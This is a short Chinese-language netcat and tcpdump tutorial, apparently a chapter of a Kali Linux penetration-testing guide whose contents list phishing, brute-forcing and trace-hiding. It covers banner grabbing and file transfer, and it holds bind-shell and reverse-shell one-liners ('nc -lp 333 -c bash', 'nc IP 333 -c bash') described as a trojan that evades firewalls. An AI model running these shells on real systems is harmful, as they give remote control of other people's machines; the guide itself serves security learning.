netcat簡介
-----------
網絡中的瑞士軍刀--體積小,功能強大
偵聽模式/傳輸模式
telnet連接(獲取banner信息)
`nc -nv IP port //連接遠程主機并獲取banner`
傳輸文本信息(遠程電子取證信息收集)
~~~
兩臺機器
A:nc -lp 666 > ps.txt
B:ps aux | nc -nv 192.168.1.11 666 -q 1
~~~
傳輸文件/目錄
文件:
~~~
A:nc -lp 333 > xx.php (接收方)
B:nc -nv IP 333 < test.php -q 1
~~~
或者
~~~
A:nc -q 1 -l 333 < a.exe (發送方)
B:nc -nv IP 333 > 123.exe
~~~
目錄:
~~~
A:tar -cvf - mulu/ | nc -lp 333 -q 1 //打包傳輸
B:nc -nv IP 333 | tar -xvf - //接收解包
~~~
加密傳輸文件
~~~
A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.exe (接收方)
B:mcrypt --flush -Fbqd -a rijndael-256 -m ecb < 0.exe | nc -nv IP 333 -q 1
~~~
遠程控制/木馬
正向:
~~~
A:nc -lp 333 -c bash (服務端主動開bash)
B:nc IP 333 (控制端)
~~~
反向:
~~~
A:nc -lp 333 (控制端)
B:nc IP 333 -c bash (繞過防火墻主動連接外部主機)
~~~
注:Windows用戶把bash改成cmd
------------
TCPDUMP--抓包(Linux、Unix默認安裝)
抓包:
默認只抓68個字節
~~~
tcpdump -i eth0 -s 0 -w file.pcap
tcpdump -i eth0 port 22
~~~
讀取抓包文件
`tcpdump -r file.pcap`
- 序言
- kali-Linux基本配置
- 忘記Root密碼
- 更新系統和軟件包
- Bash命令
- shell編程
- Linux的文件權限配置
- Linux日志文件
- 信息收集
- 被動信息收集
- 繞過CDN找真實IP
- IDS識別
- p0f-OS識別
- nmap端口掃描
- 搜索引擎
- 內網主機發現
- 使用SET社工包釣魚
- 漏洞發現
- Nessus策略漏掃
- AWVS集成漏掃
- w3af
- 其它漏掃
- 抓包改包
- Burpsite
- Fiddler
- Wireshark
- 漏洞利用
- Hydra爆破
- SQLmap
- Metasploit
- Beef
- antSwrod
- XSS前端工具
- Windows緩沖區溢出
- 后漏洞利用階段
- 免殺一句話
- 上傳工具
- 嗅探
- 本地提取
- 隱藏痕跡